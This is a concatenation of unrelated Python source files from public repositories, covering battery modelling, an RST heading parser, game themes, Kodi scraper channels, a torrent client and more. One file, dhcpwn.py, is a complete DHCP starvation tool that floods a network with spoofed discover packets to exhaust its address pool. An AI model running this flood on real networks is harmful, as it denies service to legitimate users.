                headroom = self.capacity - self.energy
                self.unmet_history.append(plan - generated)
                self.supply_history.append(0)
                self.waste_history.append(generated - headroom)
                self.energy = self.capacity
                self.status.append("""Demand can not meet by generation, also power in battery can not make up difference.
                Charge {diff} to make battery full""".format(diff=headroom))
                self.state = 'unmet'

        self.states_list.append(self.state)
        self.battery_energy_history.append(self.energy)
        self.SOC.append(self.energy / self.capacity)
        self.supply = self.supply_history[-1]
        return self.supply

    def history(self):
        """
        Get the history of the managed battery.

        :return: np array including the history of the battery: SOC, battery
            energy, unmet and wasted energy, supplied power
        """
        battery_history = np.vstack(
            (
                np.array(self.SOC),
                np.array(self.battery_energy_history),
                np.array(self.unmet_history),
                np.array(self.waste_history),
                np.array(self.supply_history),
            )
        )
        return battery_history

    def observation(self):
        """
        Observation of the current battery state.

        :return: dict with current energy and usable capacity
        """
        battery_state = {
            'current_energy': self.energy,
            'usable_capacity': self.DOD * self.capacity,
        }
        return battery_state

    def story_board(self):
        """
        For the use of explainable AI in power management system.

        :return: the status of battery
        """
        return self.status

    def lost_power_supply_probability(self):
        """
        Get the lost power supply probability of the managed battery after
        run.

        :return: float, LPSP
        """
        LPSP = 1 - self.unmet_history.count(0) / len(self.SOC)
        return LPSP

    def copy(self):
        """
        Make a copy of battery model.

        :return: Copied version of battery with same capacity and
            configuration
        """
        return Battery_managed(self.capacity, self.config)


class Soc_model_variable_load:
    """
    Obsolete basic class: runs a Battery over given power/load series.
    """

    def __init__(self, battery, power, load):
        self.battery = battery
        self.battery.run(power, load)

    def get_lost_power_supply_probability(self):
        return self.battery.lost_power_supply_probability()

    def get_battery_history(self):
        return self.battery.battery_history()

    def get_quality_performance_index(self):
        pass


def soc_model_variable_load(
    power,
    use,
    battery_capacity,
    depth_of_discharge=1,
    discharge_rate=0.005,
    battery_eff=0.9,
    discharge_eff=0.8,
):
    """
    Battery state of charge model with variable load.

    :param power: Pandas TimeSeries of total power from renewable system
    :param use: Pandas TimeSeries of load unit in W
    :param battery_capacity: float unit Wh battery capacity
    :param depth_of_discharge: float 0 to 1 maximum allowed discharge depth
    :param discharge_rate: self discharge rate
    :param battery_eff: optional 0 to 1 battery energy store efficiency default 0.9
    :param discharge_eff: battery discharge efficiency 0 to 1 default 0.8
    :return: tuple SOC: state of charge, energy history: E in battery,
        unmet_history: unmet energy history, waste_history: waste energy
        history, use_history: supplied load history
    """
    DOD = depth_of_discharge
    power = power.tolist()
    use = use.tolist()
    use_history = []
    waste_history = []
    unmet_history = []
    energy_history = []
    energy = 0
    for p, u in zip(power, use):
        if p >= u:
            use_history.append(u)
            unmet_history.append(0)
            energy_new = energy * (1 - discharge_rate) + (p - u) * battery_eff
            if energy_new < battery_capacity:
                energy = energy_new  # battery energy got update
                waste_history.append(0)
            else:
                waste_history.append(p - u)
        elif p < u:
            energy_new = energy * (1 - discharge_rate) + (p - u) / discharge_eff
            if energy_new > (1 - DOD) * battery_capacity:
                energy = energy_new
                unmet_history.append(0)
                waste_history.append(0)
                # BUG FIX: the whole `use` list used to be appended here;
                # only the per-step load `u` belongs in the history.
                use_history.append(u)
            elif energy * (1 - discharge_rate) + p * battery_eff < battery_capacity:
                energy = energy * (1 - discharge_rate) + p * battery_eff
                unmet_history.append(u - p)
                use_history.append(0)
                waste_history.append(0)
            else:
                unmet_history.append(u - p)
                use_history.append(0)
                waste_history.append(p)

        energy_history.append(energy)

    if battery_capacity == 0:
        SOC = np.array(energy_history)
    else:
        SOC = np.array(energy_history) / battery_capacity

    return SOC, energy_history, unmet_history, waste_history, use_history


if __name__ == '__main__':
    b1 = Battery(10)
    b1.run([1, 1, 1], [1, 1, 1])
    b1.run([1, 1, 1], [10, 10, 10])
    print(b1.lost_power_supply_probability())
ZelphirKaltstahl/rst-internal-links-to-raw-latex
RSTInternalLinks/HeadingsParser.py
import re


class HeadingsParser():
    """
    The HeadingParser parses the document for headings.

    It finds the document title and subtitle and converts section headings
    to raw LaTeX sectioning commands with labels, so that they can be
    referenced later.  See
    https://www.sharelatex.com/learn/Sections_and_chapters for info about
    the levels.
    """

    def __init__(self):
        super().__init__()
        self.title = None
        self.subtitle = None
        self.heading = []

        # regexes
        self.title_start_marker_regex = re.compile(r'[=]{3,}')
        self.title_end_marker_regex = re.compile(r'[=]{3,}')
        self.title_content_regex = re.compile(
            r'''
            ^                                # beginning of line
            [ ]                              # one whitespace
            [A-Za-z0-9äöüÄÖÜ]+               # alphanumerical string, no whitespace
            (?P<title>[A-Za-z0-9äöüÄÖÜ ]+)   # alphanumerical string, whitespace ok
            [A-Za-z0-9äöüÄÖÜ]+               # alphanumerical string, no whitespace
            [ ]                              # one whitespace
            $                                # end of line
            ''',
            re.VERBOSE | re.UNICODE
        )

        self.subtitle_start_marker_regex = re.compile(r'[-]{3,}')
        self.subtitle_end_marker_regex = re.compile(r'[-]{3,}')
        self.subtitle_content_regex = re.compile(
            r'''
            ^                                  # beginning of line
            [ ]                                # one whitespace
            [A-Za-z0-9äöüÄÖÜ]+                 # alphanumerical string, no whitespace
            (?P<subtitle>[A-Za-z0-9äöüÄÖÜ ]+)  # alphanumerical string, whitespace ok
            [A-Za-z0-9äöüÄÖÜ]+                 # alphanumerical string, no whitespace
            [ ]                                # one whitespace
            $                                  # end of line
            ''',
            re.VERBOSE | re.UNICODE
        )

        # Headings cannot begin with whitespace
        self.h_content_regex = re.compile(
            r'''
            ^                          # beginning of line
            [A-Za-z0-9äöüÄÖÜß(]        # alphanum
            [A-Za-z0-9äöüÄÖÜß,() -]*   # alphanum or space
            [A-Za-z0-9äöüÄÖÜß)]        # alphanum
            $                          # end of line
            ''',
            re.VERBOSE | re.UNICODE
        )

        # chapter
        self.h1_underlining_regex = re.compile(r'[=]{3,}')
        # section
        self.h2_underlining_regex = re.compile(r'[-]{3,}')
        # subsection
        self.h3_underlining_regex = re.compile(r'[~]{3,}')
        # subsubsection
        self.h4_underlining_regex = re.compile(r'[\^]{3,}')
        # paragraph
        self.h5_underlining_regex = re.compile(r'[*]{3,}')
        # subparagraph
        self.h6_underlining_regex = re.compile(r'[.]{3,}')

    def parse(self, rst_file_content):
        """
        Parse the document: store title and subtitle on the instance,
        rewrite headings in place and return the heading -> label dict.
        """
        self.title = self.find_title(rst_file_content)
        # BUG FIX: the found subtitle used to be assigned to
        # self.subtitle_content_regex, clobbering the compiled regex;
        # it belongs in self.subtitle.
        self.subtitle = self.find_subtitle(rst_file_content)
        return self.find_heading_labels(rst_file_content)

    def find_title(self, rst_file_content):
        """Return the over- and underlined document title, or None."""
        print('looking for title ...')
        title = None
        for lineno, line in enumerate(rst_file_content):
            previous_line = ""
            if lineno > 0:
                previous_line = rst_file_content[lineno - 1]
            next_line = ""
            if lineno < len(rst_file_content) - 1:
                next_line = rst_file_content[lineno + 1]

            # A title is a content line enclosed by equally long '=' markers.
            if (
                self.title_start_marker_regex.match(previous_line) and
                self.title_end_marker_regex.match(next_line) and
                (
                    len(self.title_start_marker_regex.match(previous_line).group()) ==
                    len(self.title_end_marker_regex.match(next_line).group())
                ) and
                self.title_content_regex.match(line) and
                not title
            ):
                title = self.title_content_regex.match(line).group('title')
                print('title is:|', title, '|', sep='')
                break

        if not title:
            print('Could not find title in document.')
        return title

    def find_subtitle(self, rst_file_content):
        """Return the over- and underlined document subtitle, or None."""
        print('looking for subtitle ...')
        subtitle = None
        for lineno, line in enumerate(rst_file_content):
            previous_line = ""
            if lineno > 0:
                previous_line = rst_file_content[lineno - 1]
            next_line = ""
            if lineno < len(rst_file_content) - 1:
                next_line = rst_file_content[lineno + 1]

            # A subtitle is a content line enclosed by equally long '-' markers.
            if (
                self.subtitle_start_marker_regex.match(previous_line) and
                self.subtitle_end_marker_regex.match(next_line) and
                (
                    len(self.subtitle_start_marker_regex.match(previous_line).group()) ==
                    len(self.subtitle_end_marker_regex.match(next_line).group())
                ) and
                self.subtitle_content_regex.match(line) and
                not subtitle
            ):
                subtitle = self.subtitle_content_regex.match(line).group('subtitle')
                print('subtitle is:|', subtitle, '|', sep='')
                break

        if not subtitle:
            print('Could not find subtitle in document.')
        return subtitle

    def find_heading_labels(self, rst_file_content):
        """
        Replace every underlined heading with a raw LaTeX sectioning command
        plus a label line, and return a dict mapping the original heading
        text to the generated label.
        """
        print('looking for headings ...')
        headings_dict = {}

        # Underline character decides the sectioning level; the six former
        # copy-pasted branches are folded into this table-driven loop.
        levels = (
            ('chapter', self.h1_underlining_regex),
            ('section', self.h2_underlining_regex),
            ('subsection', self.h3_underlining_regex),
            ('subsubsection', self.h4_underlining_regex),
            ('paragraph', self.h5_underlining_regex),
            ('subparagraph', self.h6_underlining_regex),
        )

        for lineno, line in enumerate(rst_file_content):
            previous_line = ""
            if lineno > 0:
                previous_line = rst_file_content[lineno - 1]
            next_line = ""
            if lineno < len(rst_file_content) - 1:
                next_line = rst_file_content[lineno + 1]

            # A heading must be preceded by a blank line.
            if not (previous_line.isspace() or previous_line == ''):
                continue
            content_match = self.h_content_regex.match(line)
            if not content_match:
                continue

            for level, underlining_regex in levels:
                underline_match = underlining_regex.match(next_line)
                # The underlining must be exactly as long as the heading.
                if underline_match and (
                    len(content_match.group()) == len(underline_match.group())
                ):
                    print('found a {0}:'.format(level), line)
                    label = self.heading_to_label(line, level)
                    headings_dict[line] = label
                    rst_file_content[lineno] = \
                        ':raw-latex:`\\{0}{{{1}}}`'.format(level, line)
                    rst_file_content[lineno + 1] = \
                        ':raw-latex:`\\label{{{0}}}`'.format(label)
                    # Underline characters are distinct per level, so at
                    # most one level can match.
                    break

        return headings_dict

    def heading_to_label(self, heading_text, level):
        """Build a LaTeX label like 'section:my-heading' from heading text."""
        heading_text = heading_text.lower()
        replaced_chars = {
            ' ': '-',
            '(': '',
            ')': ''
        }
        for key, value in replaced_chars.items():
            heading_text = heading_text.replace(key, value)
        return '{0}:{1}'.format(level, heading_text)
rowinggolfer/openmolar2
src/lib_openmolar/admin/db_orm/admin_practitioners.py
#! /usr/bin/env python
# -*- coding: utf-8 -*-

###############################################################################
##                                                                           ##
##  Copyright 2010-2012, Neil Wallace <neil@openmolar.com>                   ##
##                                                                           ##
##  This program is free software: you can redistribute it and/or modify     ##
##  it under the terms of the GNU General Public License as published by     ##
##  the Free Software Foundation, either version 3 of the License, or        ##
##  (at your option) any later version.                                      ##
##                                                                           ##
##  This program is distributed in the hope that it will be useful,          ##
##  but WITHOUT ANY WARRANTY; without even the implied warranty of           ##
##  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the            ##
##  GNU General Public License for more details.                             ##
##                                                                           ##
##  You should have received a copy of the GNU General Public License        ##
##  along with this program.  If not, see <http://www.gnu.org/licenses/>.    ##
##                                                                           ##
###############################################################################

'''
Provides schema and insert queries for the practitioner table
information about the practitioners (dentists hygienists etc..)
'''

from lib_openmolar.common.db_orm import InsertableRecord

# Database table this module populates.
TABLENAME = "practitioners"


class DemoGenerator(object):
    # Yields the INSERT queries that populate the demo database's
    # practitioners table (two dentists, one orthodontist, one hygienist).

    def __init__(self, database=None):
        # Number of demo practitioners produced by demo_queries().
        self.length = 4

        # Reusable insert-record bound to the practitioners table; the
        # time_stamp column is removed so the database default applies.
        self.record = InsertableRecord(database, TABLENAME)
        self.record.remove(self.record.indexOf("time_stamp"))

    def demo_queries(self):
        '''
        return a list of queries to populate a demo database

        NOTE(review): despite the wording above this is a generator -- it
        yields one insert query per practitioner, clearing the record's
        values between yields.  user_id presumably references rows created
        by the users demo data; confirm ordering of demo installers.
        '''
        ## practitioner 1
        self.record.setValue('user_id', 1)
        self.record.setValue('type', "dentist")
        self.record.setValue('status', "active")
        self.record.setValue('modified_by', "demo_installer")

        yield self.record.insert_query
        self.record.clearValues()

        ## practitioner 2
        self.record.setValue('user_id', 2)
        self.record.setValue('type', "dentist")
        self.record.setValue('status', "active")
        self.record.setValue('modified_by', "demo_installer")

        yield self.record.insert_query
        self.record.clearValues()

        ## practitioner 3
        self.record.setValue('user_id', 3)
        self.record.setValue('type', "dentist")
        # practitioner 3 is the only one with a speciality set.
        self.record.setValue('speciality', 'Orthodontics')
        self.record.setValue('status', "active")
        self.record.setValue('modified_by', "demo_installer")

        yield self.record.insert_query
        self.record.clearValues()

        ## practitioner 4
        self.record.setValue('user_id', 4)
        self.record.setValue('type', "hygienist")
        self.record.setValue('status', "active")
        self.record.setValue('modified_by', "demo_installer")

        yield self.record.insert_query


if __name__ == "__main__":
    from lib_openmolar.admin.connect import DemoAdminConnection
    sc = DemoAdminConnection()
    sc.connect()

    builder = DemoGenerator(sc)
    # NOTE(review): demo_queries() is a generator, so this prints the
    # generator object itself rather than the queries (Python 2 print).
    print builder.demo_queries()
jimsize/PySolFC
pysollib/winsystems/common.py
#!/usr/bin/env python
# -*- mode: python; coding: utf-8; -*-
# ---------------------------------------------------------------------------#
#
# Copyright (C) 1998-2003 Markus Franz Xaver Johannes Oberhumer
# Copyright (C) 2003 Mt. Hood Playing Card Co.
# Copyright (C) 2005-2009 Skomoroh
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.
#
# ---------------------------------------------------------------------------#

import os
import traceback

from pysollib.mygettext import _
from pysollib.settings import TITLE
from pysollib.settings import VERSION
from pysollib.settings import TOOLKIT, USE_TILE
from pysollib.settings import DEBUG
from pysollib.mfxutil import print_err

# ttk is only available (and only needed) when running on Tk with Tile.
if TOOLKIT == 'tk':
    if USE_TILE:
        from pysollib.tile import ttk


def init_tile(app, top):
    """Register the ttk themes bundled in the app data directory with Tcl."""
    # load available themes
    d = os.path.join(app.dataloader.dir, 'themes')
    if os.path.isdir(d):
        # Make the themes directory discoverable by Tcl's package system.
        top.tk.eval('global auto_path; lappend auto_path {%s}' % d)
        for t in os.listdir(d):
            if os.path.exists(os.path.join(d, t, 'pkgIndex.tcl')):
                try:
                    top.tk.eval('package require ttk::theme::'+t)
                    # print 'load theme:', t
                except Exception:
                    # A broken theme package must not abort startup.
                    traceback.print_exc()
                    pass


def set_theme(app, top, theme):
    """Apply the given ttk theme, falling back to the configured default."""
    # set theme
    style = ttk.Style(top)
    try:
        style.theme_use(theme)
    except Exception:
        print_err(_('invalid theme name: ') + theme)
        style.theme_use(app.opt.default_tile_theme)


def get_font_name(font):
    """Normalize a font spec to a (family, size, slant, weight) tuple.

    Returns None if the font cannot be resolved.
    """
    # create font name
    # i.e. "helvetica 12" -> ("helvetica", 12, "roman", "normal")
    if (TOOLKIT == 'kivy'):
        # Kivy has no Tk font machinery; a fixed spec is returned instead.
        return "helvetica 12"

    from six.moves.tkinter_font import Font
    font_name = None
    try:
        f = Font(font=font)
    except Exception:
        print_err(_('invalid font name: ') + font)
        if DEBUG:
            traceback.print_exc()
    else:
        fa = f.actual()
        font_name = (fa['family'],
                     fa['size'],
                     fa['slant'],
                     fa['weight'])
    return font_name


def base_init_root_window(root, app):
    """Toolkit-independent root window setup: title, icon name, minsize,
    and (for Tk/Tile) theme initialisation."""
    # root.wm_group(root)
    root.wm_title(TITLE + ' ' + VERSION)
    root.wm_iconname(TITLE + ' ' + VERSION)
    # set minsize
    sw, sh = (root.winfo_screenwidth(),
              root.winfo_screenheight())
    if sw < 640 or sh < 480:
        root.wm_minsize(400, 300)
    else:
        root.wm_minsize(520, 360)

    # NOTE(review): the first `if` is not part of the chain below, so on
    # gtk with USE_TILE set the elif branch would still run -- presumably
    # an `elif` chain was intended; confirm before changing.
    if TOOLKIT == 'gtk':
        pass
    if TOOLKIT == 'kivy':
        pass
    elif USE_TILE:
        theme = app.opt.tile_theme
        init_tile(app, root)
        set_theme(app, root, theme)
    else:
        pass


class BaseTkSettings:
    # Shared padding/relief constants for the Tk widget layer; the Tile
    # variant uses flat, borderless toolbars.
    canvas_padding = (0, 0)
    horizontal_toolbar_padding = (0, 0)
    vertical_toolbar_padding = (0, 1)
    toolbar_button_padding = (2, 2)
    toolbar_label_padding = (4, 4)
    if USE_TILE:
        toolbar_relief = 'flat'
        toolbar_borderwidth = 0
    else:
        toolbar_relief = 'raised'
        toolbar_button_relief = 'flat'
        toolbar_separator_relief = 'sunken'
        toolbar_borderwidth = 1
        toolbar_button_borderwidth = 1
vbeffara/Simulations
tools/massage-box.py
#! /usr/bin/env python import sys g = {} n = {} for line in sys.stdin: (n1, n2, p, q, t, tg, x) = line.strip().split(' ') t = int(t) x = float(x) key = ' '.join((n1,n2,p,q)) if not key in n: n[key] = 0 g[key] = 0 n[key] += t g[key] += x*t for key in n: print key, n[key], g[key]/n[key]
CroceRossaItaliana/jorvik
autenticazione/viste.py
# -*- coding: utf-8 -*- from __future__ import absolute_import, print_function, unicode_literals from django.contrib.auth import REDIRECT_FIELD_NAME from django.shortcuts import redirect from django.contrib.auth.views import logout as original_logout from loginas import settings as la_settings from loginas.utils import restore_original_login def logout(request, next_page=None, template_name='registration/logged_out.html', redirect_field_name=REDIRECT_FIELD_NAME, extra_context=None): """ This can replace your default logout view. In you settings, do: from django.core.urlresolvers import reverse_lazy LOGOUT_URL = reverse_lazy('logout') """ original_session = request.session.get(la_settings.USER_SESSION_FLAG) if original_session: restore_original_login(request) return redirect(la_settings.LOGOUT_REDIRECT) else: return original_logout(request, next_page, template_name, redirect_field_name, extra_context)
fracpete/python-weka-wrapper-examples
src/wekaexamples/flow/list_file.py
# This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # list_files.py # Copyright (C) 2015 Fracpete (pythonwekawrapper at gmail dot com) import traceback import tempfile import weka.core.jvm as jvm from weka.flow.control import Flow from weka.flow.source import ListFiles from weka.flow.sink import Console def main(): """ Just runs some example code. """ # setup the flow flow = Flow(name="list files") # flow.print_help() listfiles = ListFiles() listfiles.config["dir"] = str(tempfile.gettempdir()) listfiles.config["list_files"] = True listfiles.config["list_dirs"] = False listfiles.config["recursive"] = False listfiles.config["regexp"] = ".*r.*" # listfiles.print_help() flow.actors.append(listfiles) console = Console() console.config["prefix"] = "Match: " # console.print_help() flow.actors.append(console) # run the flow msg = flow.setup() if msg is None: print("\n" + flow.tree + "\n") msg = flow.execute() if msg is not None: print("Error executing flow:\n" + msg) else: print("Error setting up flow:\n" + msg) flow.wrapup() flow.cleanup() if __name__ == "__main__": try: jvm.start() main() except Exception, e: print(traceback.format_exc()) finally: jvm.stop()
FireBladeNooT/Medusa_1_6
lib/tvdbapiv2/models/series_actors.py
# coding: utf-8 """ Copyright 2015 SmartBear Software Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. Ref: https://github.com/swagger-api/swagger-codegen """ from pprint import pformat from six import iteritems class SeriesActors(object): """ NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually. """ def __init__(self): """ SeriesActors - a model defined in Swagger :param dict swaggerTypes: The key is attribute name and the value is attribute type. :param dict attributeMap: The key is attribute name and the value is json key in definition. """ self.swagger_types = { 'data': 'list[SeriesActorsData]' } self.attribute_map = { 'data': 'data' } self._data = None @property def data(self): """ Gets the data of this SeriesActors. :return: The data of this SeriesActors. :rtype: list[SeriesActorsData] """ return self._data @data.setter def data(self, data): """ Sets the data of this SeriesActors. :param data: The data of this SeriesActors. 
:type: list[SeriesActorsData] """ self._data = data def to_dict(self): """ Returns the model properties as a dict """ result = {} for attr, _ in iteritems(self.swagger_types): value = getattr(self, attr) if isinstance(value, list): result[attr] = list(map( lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value )) elif hasattr(value, "to_dict"): result[attr] = value.to_dict() else: result[attr] = value return result def to_str(self): """ Returns the string representation of the model """ return pformat(self.to_dict()) def __repr__(self): """ For `print` and `pprint` """ return self.to_str() def __eq__(self, other): """ Returns true if both objects are equal """ return self.__dict__ == other.__dict__ def __ne__(self, other): """ Returns true if both objects are not equal """ return not self == other
RobLoach/lutris
tests/check_prefixes.py
#!/usr/bin/python3 import os import sys import subprocess sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__)))) from lutris.util.wineregistry import WineRegistry PREFIXES_PATH = os.path.expanduser("~/Games/wine/prefixes") def get_registries(): registries = [] directories = os.listdir(PREFIXES_PATH) directories.append(os.path.expanduser("~/.wine")) for prefix in directories: for path in os.listdir(os.path.join(PREFIXES_PATH, prefix)): if path.endswith(".reg"): registries.append(os.path.join(PREFIXES_PATH, prefix, path)) return registries def check_registry(registry_path): with open(registry_path, 'r') as registry_file: original_content = registry_file.read() try: registry = WineRegistry(registry_path) except: sys.stderr.write("Error parsing {}\n".format(registry_path)) raise content = registry.render() if content != original_content: wrong_path = os.path.join(os.path.dirname(__file__), 'error.reg') with open(wrong_path, 'w') as wrong_reg: wrong_reg.write(content) print("Content of parsed registry doesn't match: {}".format(registry_path)) subprocess.call(["meld", registry_path, wrong_path]) sys.exit(2) registries = get_registries() for registry in registries: check_registry(registry) print("All {} registry files validated!".format(len(registries)))
pitunti/alfaPitunti
plugin.video.alfa/channels/anitoonstv.py
# -*- coding: utf-8 -*- import re from channels import renumbertools from channelselector import get_thumb from core import httptools from core import scrapertools from core import servertools from core import tmdb from core.item import Item from platformcode import config, logger from channels import autoplay IDIOMAS = {'latino': 'Latino'} list_language = IDIOMAS.values() list_servers = ['openload', 'okru', 'netutv', 'rapidvideo' ] list_quality = ['default'] host = "http://www.anitoonstv.com" def mainlist(item): logger.info() thumb_series = get_thumb("channels_tvshow.png") autoplay.init(item.channel, list_servers, list_quality) itemlist = list() itemlist.append(Item(channel=item.channel, action="lista", title="Anime", url=host, thumbnail=thumb_series)) itemlist.append(Item(channel=item.channel, action="lista", title="Series Animadas", url=host, thumbnail=thumb_series)) itemlist.append(Item(channel=item.channel, action="lista", title="Novedades", url=host, thumbnail=thumb_series)) itemlist.append(Item(channel=item.channel, action="lista", title="Pokemon", url=host, thumbnail=thumb_series)) itemlist = renumbertools.show_option(item.channel, itemlist) autoplay.show_option(item.channel, itemlist) return itemlist def lista(item): logger.info() itemlist = [] data = httptools.downloadpage(item.url).data data = re.sub(r"\n|\r|\t|\s{2}|&nbsp;", "", data) if 'Novedades' in item.title: patron_cat = '<div class="activos"><h3>(.+?)<\/h2><\/a><\/div>' patron = '<a href="(.+?)"><h2><span>(.+?)<\/span>' else: patron_cat = '<li><a href=.+?>' patron_cat += str(item.title) patron_cat += '<\/a><div>(.+?)<\/div><\/li>' patron = "<a href='(.+?)'>(.+?)<\/a>" data = scrapertools.find_single_match(data, patron_cat) matches = scrapertools.find_multiple_matches(data, patron) for link, name in matches: if "Novedades" in item.title: url = link title = name.capitalize() else: url = host + link title = name if ":" in title: cad = title.split(":") show = cad[0] else: if "(" in title: cad = 
title.split("(") if "Super" in title: show = cad[1] show = show.replace(")", "") else: show = cad[0] else: show = title if "&" in show: cad = title.split("xy") show = cad[0] context1=[renumbertools.context(item), autoplay.context] itemlist.append( item.clone(title=title, url=url, plot=show, action="episodios", show=show, context=context1)) tmdb.set_infoLabels(itemlist) return itemlist def episodios(item): logger.info() itemlist = [] data = httptools.downloadpage(item.url).data data = re.sub(r"\n|\r|\t|\s{2}|&nbsp;", "", data) patron = '<div class="pagina">(.+?)<\/div><div id="fade".+?>' data = scrapertools.find_single_match(data, patron) patron_caps = "<a href='(.+?)'>Capitulo: (.+?) - (.+?)<\/a>" matches = scrapertools.find_multiple_matches(data, patron_caps) show = scrapertools.find_single_match(data, '<span>Titulo.+?<\/span>(.+?)<br><span>') scrapedthumbnail = scrapertools.find_single_match(data, "<img src='(.+?)'.+?>") scrapedplot = scrapertools.find_single_match(data, '<span>Descripcion.+?<\/span>(.+?)<br>') i = 0 temp = 0 for link, cap, name in matches: if int(cap) == 1: temp = temp + 1 if int(cap) < 10: cap = "0" + cap season = temp episode = int(cap) season, episode = renumbertools.numbered_for_tratk( item.channel, item.show, season, episode) date = name title = "%sx%s %s (%s)" % (season, str(episode).zfill(2), "Episodio %s" % episode, date) # title = str(temp)+"x"+cap+" "+name url = host + "/" + link if "NO DISPONIBLE" not in name: itemlist.append(Item(channel=item.channel, action="findvideos", title=title, thumbnail=scrapedthumbnail, plot=scrapedplot, url=url, show=show)) if config.get_videolibrary_support() and len(itemlist) > 0: itemlist.append(Item(channel=item.channel, title="Añadir esta serie a la videoteca", url=item.url, action="add_serie_to_library", extra="episodios", show=show)) return itemlist def findvideos(item): logger.info() itemlist = [] data = httptools.downloadpage(item.url).data data1 = re.sub(r"\n|\r|\t|\s{2}|&nbsp;", "", data) 
data_vid = scrapertools.find_single_match(data1, '<div class="videos">(.+?)<\/div><div .+?>') # name = scrapertools.find_single_match(data,'<span>Titulo.+?<\/span>([^<]+)<br>') scrapedplot = scrapertools.find_single_match(data, '<br><span>Descrip.+?<\/span>([^<]+)<br>') scrapedthumbnail = scrapertools.find_single_match(data, '<div class="caracteristicas"><img src="([^<]+)">') itemla = scrapertools.find_multiple_matches(data_vid, '<div class="serv">.+?-(.+?)-(.+?)<\/div><.+? src="(.+?)"') for server, quality, url in itemla: if "Calidad Alta" in quality: quality = quality.replace("Calidad Alta", "HQ") server = server.lower().strip() if "ok" == server: server = 'okru' if "netu" == server: continue itemlist.append(item.clone(url=url, action="play", server=server, contentQuality=quality, thumbnail=scrapedthumbnail, plot=scrapedplot, title="Enlace encontrado en %s: [%s]" % (server.capitalize(), quality))) autoplay.start(itemlist, item) return itemlist def play(item): logger.info() itemlist = [] # Buscamos video por servidor ... devuelve = servertools.findvideosbyserver(item.url, item.server) if not devuelve: # ...sino lo encontramos buscamos en todos los servidores disponibles devuelve = servertools.findvideos(item.url, skip=True) if devuelve: # logger.debug(devuelve) itemlist.append(Item(channel=item.channel, title=item.contentTitle, action="play", server=devuelve[0][2], url=devuelve[0][1], thumbnail=item.thumbnail)) return itemlist
mschwager/dhcpwn
dhcpwn.py
#!/usr/bin/env python3 import argparse import logging import string # Quiet scapy logging.getLogger("scapy.runtime").setLevel(logging.ERROR) from scapy import volatile # noqa: E402 from scapy import sendrecv # noqa: E402 from scapy import config # noqa: E402 from scapy.layers import l2 # noqa: E402 from scapy.layers import inet # noqa: E402 from scapy.layers import dhcp # noqa: E402 # Configuration requires these imports to properly initialize from scapy import route # noqa: E402, F401 from scapy import route6 # noqa: E402, F401 def dhcp_flood(**kwargs): iface = kwargs["interface"] count = kwargs["count"] unique_hexdigits = str.encode("".join(set(string.hexdigits.lower()))) packet = ( l2.Ether(dst="ff:ff:ff:ff:ff:ff") / inet.IP(src="0.0.0.0", dst="255.255.255.255") / inet.UDP(sport=68, dport=67) / dhcp.BOOTP(chaddr=volatile.RandString(12, unique_hexdigits)) / dhcp.DHCP(options=[("message-type", "discover"), "end"]) ) sendrecv.sendp( packet, iface=iface, count=count ) def print_dhcp_response(response): print("Source: {}".format(response[l2.Ether].src)) print("Destination: {}".format(response[l2.Ether].dst)) for option in response[dhcp.DHCP].options: if isinstance(option, tuple): option, *values = option else: # For some reason some options are strings instead of tuples option, *values = option, None if option in ["end", "pad"]: break output = "Option: {} -> {}".format(option, values) if option == "message-type" and len(values) == 1: dhcp_type = dhcp.DHCPTypes.get(values[0], "unknown") output = "{} ({})".format(output, dhcp_type) print(output) def dhcp_sniff(**kwargs): sendrecv.sniff(filter="udp and (port 67 or 68)", prn=print_dhcp_response) def parse_args(): p = argparse.ArgumentParser(description=''' All your IPs are belong to us. 
''', formatter_class=argparse.RawTextHelpFormatter) p.add_argument( '-i', '--interface', action='store', default=config.conf.iface, help='network interface to use' ) subparsers = p.add_subparsers(dest='command') subparsers.required = True flood = subparsers.add_parser('flood') flood.add_argument( '-c', '--count', action='store', default=10, type=int, help='number of addresses to consume' ) subparsers.add_parser('sniff') args = p.parse_args() return args def main(): args = parse_args() dispatch = { "flood": dhcp_flood, "sniff": dhcp_sniff, } dispatch[args.command](**vars(args)) if __name__ == "__main__": main()
alfa-jor/addon
plugin.video.alfa/lib/btserver/client.py
# -*- coding: utf-8 -*- import os import pickle import random import time import urllib try: import xbmc, xbmcgui except: pass from platformcode import config, logger LIBTORRENT_PATH = config.get_setting("libtorrent_path", server="torrent", default='') from servers import torrent as torr lt, e, e1, e2 = torr.import_libtorrent(LIBTORRENT_PATH) from cache import Cache from dispatcher import Dispatcher from file import File from handler import Handler from monitor import Monitor from resume_data import ResumeData from server import Server try: BUFFER = int(config.get_setting("bt_buffer", server="torrent", default="50")) except: BUFFER = 50 config.set_setting("bt_buffer", "50", server="torrent") DOWNLOAD_PATH = config.get_setting("bt_download_path", server="torrent", default=config.get_setting("downloadpath")) BACKGROUND = config.get_setting("mct_background_download", server="torrent", default=True) RAR = config.get_setting("mct_rar_unpack", server="torrent", default=True) msg_header = 'Alfa BT Cliente Torrent' class Client(object): INITIAL_TRACKERS = ['udp://tracker.openbittorrent.com:80', 'udp://tracker.istole.it:80', 'udp://open.demonii.com:80', 'udp://tracker.coppersurfer.tk:80', 'udp://tracker.leechers-paradise.org:6969', 'udp://exodus.desync.com:6969', 